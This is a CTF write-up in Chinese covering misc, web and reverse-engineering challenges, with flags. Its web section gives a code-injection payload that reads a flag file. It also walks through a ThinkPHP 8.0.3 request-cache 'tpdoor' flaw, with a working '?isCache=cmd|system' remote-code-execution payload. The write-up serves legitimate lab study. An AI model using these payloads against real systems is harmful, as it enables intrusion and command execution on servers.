misc

二维码拼图

屏幕截图 2024-07-05 232719

屏幕截图 2024-07-05 232645

ctfshow{2408979e-b2be-4442-b4d9-679ccb5b8298}

web

CodeInject

image-20240705202008290

1=system("cat /000f1ag.txt")

ctfshow{375b20aa-248f-421d-b570-cfdbf5fab5d6}

tpdoor

给了部分源码

<?php

namespace app\controller;

use app\BaseController;
use think\facade\Db; // imported but not used in the code shown here

// Challenge controller exactly as handed out. The comments are review notes
// explaining why it is exploitable; no code has been changed, so the line
// references in the walkthrough below still hold.
class Index extends BaseController
{
    // CheckRequestCache is registered for this controller, so every request
    // passes through the middleware that reads request_cache_key back out of
    // config/route.php (see the parseCacheKey excerpt quoted below).
    protected $middleware = ['think\middleware\AllowCrossDomain','think\middleware\CheckRequestCache','think\middleware\LoadLangPack','think\middleware\SessionInit'];

    /**
     * Enable request caching by rewriting config/route.php.
     *
     * @param mixed $isCache   Request-controlled (a GET parameter in the writeup).
     *                         Anything that compares loosely equal to true takes
     *                         the cache branch and is persisted verbatim as the key.
     * @param mixed $cacheTime Cache lifetime in seconds; passed through intval().
     * @return string Status text.
     */
    public function index($isCache = false , $cacheTime = 3600)
    {
        
        if($isCache == true){		// loose comparison: any non-empty string other than "0" passes, so "ls /|system" counts as true
            $config = require  __DIR__.'/../../config/route.php';
            // Sink #1: the unvalidated request value becomes request_cache_key.
            // The middleware later splits that string on '|' and calls the part
            // after the bar as a function, so "cmd|system" gives RCE on the next request.
            $config['request_cache_key'] = $isCache;
            // Persisted as request_cache_expire. A large value keeps the cached
            // response (and with it the first command's output) pinned, which is
            // why the walkthrough passes a small cacheTime on later requests.
            $config['request_cache_expire'] = intval($cacheTime);
            // Empties the exclusion list; presumably no route is exempt from
            // request caching after this — confirm against the middleware.
            $config['request_cache_except'] = [];
            // Sink #2: the whole config, attacker-controlled strings included,
            // is var_export'ed back over config/route.php. The write survives
            // across requests and processes (a file-backed backdoor, hence
            // "tpdoor"), so a single "arming" request is enough.
            file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');
            return 'cache is enabled';
        }else{
            return 'Welcome ,cache is disabled';
        }
    }



}

报错发现版本为V8.0.3

image-20240712141307010

第 21 行（file_put_contents）是关键位置：用户可控的 $isCache 会被写入 config/route.php，估计要利用的就是 route.php 会被框架在每次请求时重新加载这一点。

image-20240711230601783

image-20240711230458148

查看thinkphp源码

/config/route.php

image-20240712143842180

通过

$config = require __DIR__.'/../../config/route.php';

$config['request_cache_key'] = $isCache;

GET 传参 isCache 即可改变 $config['request_cache_key'] 的值（$isCache == true 是弱比较，任意非空且不为 "0" 的字符串都能进入该分支），然后通过 file_put_contents(__DIR__.'/../../config/route.php', '<?php return '. var_export($config, true). ';');

覆写进route.php

image-20240712145628341

在中间件 WWW\tp\vendor\topthink\framework\src\think\middleware\CheckRequestCache.php 中,每次请求都会读取 route.php 里 request_cache_key 对应的值,赋给 $key

image-20240712152615972

再传入parseCacheKey函数

image-20240712151659054

而parseCacheKey中

        if (true === $key) {
            // 自动缓存功能
            $key = '__URL__';
        } elseif (str_contains($key, '|')) {
            [$key, $fun] = explode('|', $key);
        }

        if (isset($fun)) {
            $key = $fun($key);
        }

parseCacheKey 用 explode 按 '|' 把 $key 拆成 $key（'|' 前的部分，作为参数）和 $fun（'|' 后的部分，作为可变函数名），随后直接调用 $fun($key)，所示代码里对函数名没有任何限制，因此构造 [参数]|[可变函数] 即可 RCE。

因此,我们先 GET 传一次 ?isCache=ls /|system，把它作为 request_cache_key 覆写进 route.php（这一步只是布置，命令要到下一次请求才会执行）

屏幕截图 2024-07-12 135543

再任意发一次请求：中间件 CheckRequestCache.php 读取 route.php 中的 request_cache_key 并传入 parseCacheKey，$fun($key) 即 system('ls /') 被执行

屏幕截图 2024-07-12 135535

发现只执行了一次：后续无论怎么请求，返回的都是 ls / 的结果。原因是 request_cache_expire 被固定写成了 3600（$cacheTime 的默认值）并写进了 config，这 3600s 内中间件应该是直接返回缓存的响应，不会重新调用 $fun。

image-20240712155959705

每次传参时顺带把 cacheTime 设成一个很小的值即可（它经 intval() 后写入 request_cache_expire，缓存很快过期）。另外注意每次请求都会持久化覆盖 config/route.php，做完题记得恢复。例如

?isCache=ls%20/|system&cacheTime=3

image-20240712161536755

ctfshow{0a2bb4b0-ec7c-404f-abc5-ffa9b4bbef8b}

RE

pe

修复pe头可以获flag

image-20240705204414745

image-20240705204418999

image-20240705204437872

CTFShow{i95f5417b37c5e8019372de8737fI}

一个西瓜切两半你一半我一半

pyc逆向

正宗太极: 一个西瓜切两半你一半我一半
乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤

#!/usr/bin/env python
# visit https://tool.lu/pyc/ for more information
# Version: Python 3.6
#
# Decompiled challenge binary, reproduced as-is. Both literals below are
# placeholders: the flag literal says "fake" and the key literal reads
# "this is a fake key". The writeup substitutes the challenge hint as the key.

flag = 'ctfshow{this_is_fake_flag}'
key = '这是假的密钥'
tmp = ''
# Step 1: shift every flag character down by 32 code points.
for i in flag:
    tmp += chr(ord(i) - 32)

crypt = ''
# Step 2: add the code point of key[i % len(key)] to each shifted character,
# i.e. the key repeats over the message. With a CJK key the result lands in
# CJK code points, which is why the ciphertext looks like Chinese text.
for i in range(len(tmp)):
    crypt += chr(ord(tmp[i]) + ord(key[i % len(key)]))

print(crypt)

解密

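# Ciphertext from the challenge and the key taken from the challenge hint
# (the key in the decompiled pyc is only a placeholder).
crypt = '乃乾觅甯剏乳厡侻丨厏扝乌博丿乜规甲剌乶厝侥丿卻扚丠厘丿乎覟瓬剤'
key = '一个西瓜切两半你一半我一半'


def decrypt(crypt: str, key: str) -> str:
    """Invert the two-step transform from the decompiled pyc.

    The pyc computed crypt[i] = chr((ord(flag[i]) - 32) + ord(key[i % len(key)])),
    so each plaintext character is recovered by subtracting the matching
    (repeating) key character and adding the 32 back.

    Args:
        crypt: the ciphertext string.
        key: the repeating key; must be non-empty.

    Returns:
        The recovered plaintext.

    Raises:
        ValueError: if key is empty (i % len(key) would divide by zero).
    """
    if not key:
        raise ValueError('key must be non-empty')
    return ''.join(
        chr(ord(c) - ord(key[i % len(key)]) + 32)
        for i, c in enumerate(crypt)
    )


flag = decrypt(crypt, key)
print(flag)  # Output: ctfshow{Hell0_Reverse_Qi@n_D@0}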

ctfshow{Hell0_Reverse_Qi@n_D@0}

easy_re

探索进制的奥秘

屏幕截图 2024-07-06 000648

CTFShow{Thank_CTFSHOW_Sky}

E

逆个🥚

屏幕截图 2024-07-06 004533

本来盲猜换表,没想到直接base64

屏幕截图 2024-07-06 004903

CTFSHOW{JIAMI_SHOW_YAN}

总结

web手web是做不了一点,RE倒是差点AK,果然,我不配当web手,重生之我是re手